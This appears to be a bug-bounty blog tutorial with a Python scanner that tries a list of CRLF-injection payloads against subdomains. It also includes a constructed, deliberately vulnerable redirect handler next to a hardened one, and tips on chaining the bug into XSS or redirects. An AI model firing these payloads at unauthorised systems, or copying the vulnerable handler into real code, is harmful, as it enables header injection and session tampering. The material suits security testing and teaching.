Easy Python script to find top-level CRLF bugs.
Automating CRLF Bugs
CRLF injection is easy to detect because a successful injection lets you set response headers of your own. Detection is simply an exploitation attempt: send a payload that should add a distinctive header, then check whether that header comes back in the response. The steps we will take are:
- Get full URL of service to test
- Add payload at the end of URL
- Send GET request to this modified URL
- Check the response headers for the header we tried to inject
- Go to step 2 until we have tried all of our payloads
In order to find good payloads I looked at openly disclosed bug bounty reports and used all of the unique payloads that I found.
Assuming the company subdomains are in a text file the code to automate this will look like the following:
```python
import requests
import urllib3

# We deliberately skip TLS certificate verification (verify=False) so that
# hosts with broken certificates are still tested; silence the warning that
# requests would otherwise print for every single request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Each payload should create a "Set-Cookie: mycookie=myvalue" response header
# if the target is vulnerable. Collected from public bug bounty reports.
PAYLOADS = [
    r"%0D%0ASet-Cookie:mycookie=myvalue",
    r"%0d%0aSet-Cookie:mycookie=myvalue",
    r"crlf%0dSet-Cookie:mycookie=myvalue",
    r"crlf%0aSet-Cookie:mycookie=myvalue",
    r"%23%0dSet-Cookie:mycookie=myvalue",
    r"%0dSet-Cookie:mycookie=myvalue",
    r"%0ASet-Cookie:mycookie=myvalue?foo",
    r"%0aSet-Cookie:mycookie=myvalue",
    r"/xxx%0ASet-Cookie:mycookie=myvalue;",
]


def crlf(protocol, subdomain):
    """Try every payload against one host.

    protocol is either 'http://' or 'https://'. Returns True if any payload
    produced our cookie in the response headers, False otherwise (including
    when the host timed out and the remaining payloads were skipped).
    """
    vulnerable = False
    for payload in PAYLOADS:
        url = "%s%s/%s" % (protocol, subdomain, payload)
        try:
            # allow_redirects=False: the injected header usually lands on the
            # redirect response itself, so that is the response to inspect.
            r = requests.get(url, verify=False, timeout=0.5,
                             allow_redirects=False)
            # requests parses Set-Cookie headers into r.cookies; only a real
            # header counts, a payload merely echoed in the body does not.
            for name in r.cookies.keys():
                if "mycookie" in name:
                    print("[+] Vulnerable: %s" % url)
                    vulnerable = True
        except requests.Timeout:
            # A host that does not answer within the timeout is skipped.
            print("\tTimeout: %s" % url)
            return False
        except Exception as e:
            print("ERROR STRING: %s" % url)
            print(str(e))
    return vulnerable


if __name__ == "__main__":
    with open("bug_bounty.txt", "r") as f:
        for line in f:
            subdomain = line.strip()  # drop the trailing newline
            if subdomain:
                crlf("https://", subdomain)
```
The script reads a text file called “bug_bounty.txt” in the same directory as the script. The file needs one subdomain per line. For instance, a valid text file would look like the following:
The script then tries every payload against each subdomain, prefixing the protocol passed to crlf() in the __main__ block (https:// by default); change that argument to http:// to test plain HTTP instead.
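To show why the check in the steps above works, and what the kind of server-side bug it finds looks like, here is an added offline example. It was written for this page and is not the author's scanner, nor does it model any real product: it builds raw HTTP responses from a hypothetical redirect handler that copies the decoded request path into a Location header, places the hardened version of that handler beside it, adds a handler that merely reflects the input in the body, and then applies the scanner's rule that only a Set-Cookie header carrying the marker counts as a finding. The hostname example.com, the handler functions and the payload strings fed to them are assumptions for illustration.

```python
import re
import urllib.parse

# Name of the marker cookie the payloads try to inject (same as the scanner).
MARKER = "mycookie"


def vulnerable_redirect(path: str) -> bytes:
    """Constructed, hypothetical redirector with the bug: the decoded request
    path is copied straight into the Location header, so a decoded %0d%0a
    terminates that header and whatever follows becomes a header of its own."""
    target = urllib.parse.unquote(path)  # server-side decoding of %0D%0A
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: https://example.com" + target + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def hardened_redirect(path: str) -> bytes:
    """Same redirector with the fix: refuse any CR or LF in a value that is
    about to be placed in a header."""
    target = urllib.parse.unquote(path)
    if "\r" in target or "\n" in target:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: https://example.com" + target + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def reflecting_404(path: str) -> bytes:
    """Constructed handler that only echoes the path in the body. The payload
    text is present in the response, but no header was injected."""
    body = ("Not found: " + urllib.parse.unquote(path)).encode("latin-1")
    return (
        b"HTTP/1.1 404 Not Found\r\n"
        b"Content-Type: text/plain\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"\r\n" + body
    )


def parse_headers(raw: bytes) -> dict:
    """Split a raw HTTP response into {lowercased name: [values]}.
    Like http.client (which requests uses underneath), a bare LF is accepted
    as a line terminator, so %0a-only payloads are detected; a bare CR is not."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in re.split(r"\r?\n", head.decode("latin-1"))[1:]:  # skip status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def injected_cookie_names(raw: bytes) -> list:
    """Cookie names from Set-Cookie headers that contain our marker. This is
    the check the scanner performs through r.cookies: only a header counts,
    text in the body is ignored."""
    names = []
    for cookie in parse_headers(raw).get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        if MARKER in name:
            names.append(name)
    return names


def is_vulnerable(handler, payload: str) -> bool:
    """Steps 2 to 4 of the procedure against an in-process handler: append
    the payload to the path, 'send' it, inspect the response headers."""
    return bool(injected_cookie_names(handler("/" + payload)))


if __name__ == "__main__":
    payload = "%0D%0ASet-Cookie:mycookie=myvalue"
    for handler in (vulnerable_redirect, hardened_redirect, reflecting_404):
        print(handler.__name__, "->", is_vulnerable(handler, payload))
```

The bare-CR payloads in the scanner's list (%0d on its own) only work against servers or clients that treat a lone CR as a line break; this parser, like Python's http.client, does not, so keep that in mind when a %0d-only payload comes back clean.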
You might be lucky and get paid for this bug on its own, but usually it does not pay by itself. It becomes worth more as a chained vulnerability: if you can find a page that reads a cookie insecurely (for example, reflects its value into the page or uses it as a redirect target), set that cookie to your payload through the CRLF injection and then navigate to that page to have the XSS or URL redirection fire.
Good luck hunting!